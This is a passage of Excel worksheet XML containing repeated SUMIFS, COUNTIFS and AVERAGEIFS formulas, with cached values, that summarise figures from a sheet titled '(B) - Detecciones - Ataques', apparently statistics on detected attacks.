        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
)
</f>
        <v>1.100798403</v>
      </c>
      <c r="AE165" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DI$3:$DI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DI$3:$DI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
)
</f>
        <v>1.92</v>
      </c>
      <c r="AF165" s="502">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DI$3:$DI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DI$3:$DI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
)
</f>
        <v>4.228756131</v>
      </c>
      <c r="AG165" s="271"/>
      <c r="AH165" s="352" t="s">
        <v>2589</v>
      </c>
      <c r="AI165" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DI$3:$DI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>0.01116504854</v>
      </c>
      <c r="AJ165" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DI$3:$DI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>1</v>
      </c>
      <c r="AK165" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DI$3:$DI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AK$131)
</f>
        <v>2.5</v>
      </c>
      <c r="AL165" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DI$3:$DI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AL$131)
</f>
        <v>0</v>
      </c>
      <c r="AM165" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN165" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO165" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP165" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ165" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DI$3:$DI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>0.6526315789</v>
      </c>
      <c r="AR165" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DI$3:$DI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>1.166666667</v>
      </c>
      <c r="AS165" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT165" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DI$3:$DI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>3</v>
      </c>
      <c r="AU165" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DI$3:$DI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>3.5</v>
      </c>
      <c r="AV165" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DI$3:$DI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>2</v>
      </c>
      <c r="AW165" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AX165" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DI$3:$DI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>2.875</v>
      </c>
      <c r="AY165" s="534" t="s">
        <v>12</v>
      </c>
      <c r="AZ165" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DI$3:$DI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>0.5</v>
      </c>
      <c r="BA165" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DI$3:$DI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>14</v>
      </c>
      <c r="BB165" s="534" t="s">
        <v>12</v>
      </c>
      <c r="BC165" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DI$3:$DI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>0.3333333333</v>
      </c>
      <c r="BD165" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BE165" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DI$3:$DI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>0</v>
      </c>
      <c r="BF165" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DI$3:$DI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>0</v>
      </c>
      <c r="BG165" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DI$3:$DI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>0</v>
      </c>
      <c r="BH165" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DI$3:$DI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>792</v>
      </c>
      <c r="BI165" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BJ165" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BK165" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BL165" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DI$3:$DI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>1</v>
      </c>
      <c r="BM165" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DI$3:$DI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>14981.65935</v>
      </c>
      <c r="BN165" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DI$3:$DI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>1084.766166</v>
      </c>
      <c r="BO165" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BP165" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BQ165" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DI$3:$DI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>0</v>
      </c>
      <c r="BR165" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BS165" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DI$3:$DI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>6</v>
      </c>
      <c r="BT165" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BU165" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BV165" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DI$3:$DI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>0</v>
      </c>
      <c r="BW165" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DI$3:$DI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>4</v>
      </c>
      <c r="BX165" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BY165" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DI$3:$DI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>0.0625</v>
      </c>
      <c r="BZ165" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DI$3:$DI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>0.162601626</v>
      </c>
      <c r="CA165" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CB165" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CC165" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CD165" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CE165" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CF165" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DI$3:$DI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>4</v>
      </c>
      <c r="CG165" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CH165" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DI$3:$DI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>1</v>
      </c>
      <c r="CI165" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DI$3:$DI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>0</v>
      </c>
      <c r="CJ165" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CK165" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DI$3:$DI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>13</v>
      </c>
      <c r="CL165" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CM165" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DI$3:$DI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>81</v>
      </c>
      <c r="CN165" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DI$3:$DI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>0</v>
      </c>
      <c r="CO165" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DI$3:$DI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>2</v>
      </c>
      <c r="CP165" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DI$3:$DI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>20</v>
      </c>
      <c r="CQ165" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DI$3:$DI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>3</v>
      </c>
      <c r="CR165" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CS165" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CT165" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DI$3:$DI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0.003992015968</v>
      </c>
      <c r="CU165" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CV165" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DI$3:$DI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>0</v>
      </c>
      <c r="CW165" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CX165" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DI$3:$DI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>5.5</v>
      </c>
      <c r="CY165" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DI$3:$DI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>1.5</v>
      </c>
      <c r="CZ165" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DA165" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DB165" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DC165" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DD165" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DE165" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DF165" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DG165" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DH165" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DI$3:$DI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>1.053333333</v>
      </c>
      <c r="DI165" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DJ165" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DI$3:$DI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DJ$131)
</f>
        <v>1.363636364</v>
      </c>
      <c r="DK165" s="271"/>
    </row>
    <row r="166">
      <c r="J166" s="277"/>
      <c r="K166" s="512"/>
      <c r="L166" s="512"/>
      <c r="M166" s="512"/>
      <c r="N166" s="512"/>
      <c r="O166" s="278"/>
      <c r="Q166" s="271"/>
      <c r="R166" s="352" t="s">
        <v>2590</v>
      </c>
      <c r="S166" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EY$3:$EY$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EY$3:$EY$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
)
</f>
        <v>0.8353559871</v>
      </c>
      <c r="T166" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EY$3:$EY$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EY$3:$EY$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="U166" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EY$3:$EY$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EY$3:$EY$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
)
</f>
        <v>10.83859649</v>
      </c>
      <c r="V166" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EY$3:$EY$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EY$3:$EY$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
)
</f>
        <v>9.34375</v>
      </c>
      <c r="W166" s="532">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EY$3:$EY$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EY$3:$EY$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
)
</f>
        <v>26</v>
      </c>
      <c r="X166" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EY$3:$EY$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EY$3:$EY$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
)
</f>
        <v>13093.57143</v>
      </c>
      <c r="Y166" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EY$3:$EY$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EY$3:$EY$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
)
</f>
        <v>160.65</v>
      </c>
      <c r="Z166" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EY$3:$EY$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EY$3:$EY$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
)
</f>
        <v>247531.0383</v>
      </c>
      <c r="AA166" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EY$3:$EY$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EY$3:$EY$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
)
</f>
        <v>2.618654122</v>
      </c>
      <c r="AB166" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EY$3:$EY$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EY$3:$EY$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
)
</f>
        <v>29.171875</v>
      </c>
      <c r="AC166" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EY$3:$EY$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EY$3:$EY$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
)
</f>
        <v>6.65</v>
      </c>
      <c r="AD166" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EY$3:$EY$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EY$3:$EY$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
)
</f>
        <v>2.000798403</v>
      </c>
      <c r="AE166" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EY$3:$EY$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EY$3:$EY$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
)
</f>
        <v>2.68</v>
      </c>
      <c r="AF166" s="502">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EY$3:$EY$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EY$3:$EY$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
)
</f>
        <v>7.197929293</v>
      </c>
      <c r="AG166" s="271"/>
